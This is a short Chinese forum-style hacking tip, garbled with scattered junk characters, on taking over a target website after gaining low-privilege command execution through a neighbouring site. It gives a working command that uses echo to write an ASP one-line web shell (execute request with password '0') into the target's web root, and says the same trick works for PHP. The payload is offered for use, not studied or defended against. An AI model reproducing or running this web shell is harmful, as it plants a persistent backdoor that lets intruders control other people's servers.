在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。! L. O! t5 a* [, r: @5 h
9 F; A! O0 r8 `2 K
命令格式
. Z+ |- ]0 N; Q! s% D+ h' e, D& q s8 V2 G1 z3 @
Echo 语句 >目标站绝对目录0 G6 z% L( N" ]
0 ^, ], A# E$ @ m) J D7 [例如: T, B/ }' d9 t/ c5 n0 Z2 C
' J8 [/ I- s3 M: i5 jecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp8 S; `6 J5 V0 g$ L/ k
0 ^, f8 }& T, A5 g$ P6 ^; a- B9 F
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
" P% |! ]; f+ s/ i( R. f& Y |